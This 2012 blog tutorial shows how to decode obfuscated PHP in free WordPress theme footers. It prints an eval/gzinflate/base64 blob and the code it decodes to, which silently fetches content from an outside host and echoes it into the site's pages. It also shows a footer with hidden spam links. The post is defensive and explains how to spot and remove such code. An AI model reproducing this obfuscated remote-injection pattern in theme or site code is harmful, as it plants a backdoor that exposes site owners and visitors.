How to Decode a Free WordPress Theme Footer

By | July 5, 2012

Most of us use free software. It is ok when you have the ability to change everything and even contribute to make the software better. The whole LAMP system is open source and you should never pay a penny for its usage. Same thing comes for WordPress. You can download it for free at the official site and use it in the way you like. There are also some “free” wordpress themes, that are not so free as it seems from the first sight. Let’s check what you should avoid using free wordpress themes.

First of all, you need to check all theme files. You should not admit any encrypted code as you cannot know what it actually does. If any of your theme files are encrypted, you should decrypt them to make sure they’re safe. Here is a brief guide how to do this.

You need to locate the file that contains encrypted code. Usually it can be found in footer.php, but there are some other methods of encrypted code placement. You should use grep on linux, and search under Windows to detect the encoded files.

Let’s take we have found the file with encrypted code. What to do next?

Next we need to decrypt it. Here is the resource that allows you to decrypt PHP code.

In the sample I am trying to decrypt my footer.php looks like:

<? eval(gzinflate(base64_decode(‘vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A’))); ?>

I have no idea what’s written there. That’s why I copy and paste the contents to the online Base64 Decoder. Here is the output:

error_reporting(0);
$CodeURL = “http://linkdock.com/content.php?id=&host=”.urlencode($_SERVER[“HTTP_HOST”]).”&uri=”.urlencode($_SERVER[“REQUEST_URI”]);if ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file_get_contents”)) {    echo @file_get_contents($CodeURL);} elseif ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file”)) {    $content = @file($CodeURL);    echo @join(“”, $content);} elseif (function_exists(“curl_init”)) {    $ch = curl_init($CodeURL);    curl_setopt($ch, CURLOPT_HEADER, 0);    curl_exec($ch);    curl_close($ch);}

If you try to analyze the code, you will see that it downloads something from an external site and shows it on mine. It is acceptable if there are some links, but if they put any exploit there? I cannot risk so much to keep this code on my site. In this case you can delete the whole encrypted code block and be sure you are now safe.

Let’s check another encoded footer. Here is what we get after decode:

?><div>    <div>                <a href=”<?php bloginfo(‘rss2_url’); ?>” title=”RSS”></a>                <div><p>    Designed by <a href=”http://www.collagen1.net”>collagen</a> | <a href=”http://www.projectswole.com/diet/70-protein-shake-recipes/”>protein shakes</a> | <a href=”http://resveratrolsite.org”>resveratrol</a>    | <a href=”http://www.projectswole.com/diet/acai-berry-the-new-weight-loss-superfood/”>acai</a><br />    Copyright © 2009 <?php bloginfo(‘name’); ?>. All Rights Reserved.</p></div>    </div>    <div>    </div></div>    </div></div><p>    </p></div><!– <?php printf(__(‘%d queries. %s seconds.’, ‘kubrick’), get_num_queries(), timer_stop(0, 3)); ?> –><div><?php wp_footer(); ?></div></body></html><?

In this case we cannot simply delete the code, as it will break our theme. We will need to extract the necessary html code and put it in footer.php. Since we don’t need those links to be shown on the page, we will leave only the elements that we need.

<div><div><a href=”<?php bloginfo(‘rss2_url’); ?>” title=”RSS”></a>
<div><p>  Copyright © 2009-2012 <?php bloginfo(‘name’); ?>. All Rights Reserved.</p>
</div>    </div>    <div>    </div></div>   </div></div><p>
</p></div><!– <?php printf(__(‘%d queries. %s seconds.’, ‘kubrick’), get_num_queries(), timer_stop(0, 3)); ?> –><div><?php wp_footer(); ?></div></body></html>

That’s all! Now we have our site clear of any suspicious code.

When I write this post I would like to mention that I understand the people who create free wordpress themes. But when the theme contains encrypted code, it is potentially dangerous and unsafe. So, if you would like to support the theme author, you can leave the links in the footer, but only after you ensure it is safe.

If you have any footers you cannot decrypt, please, post them in comments and I will assist you to do it.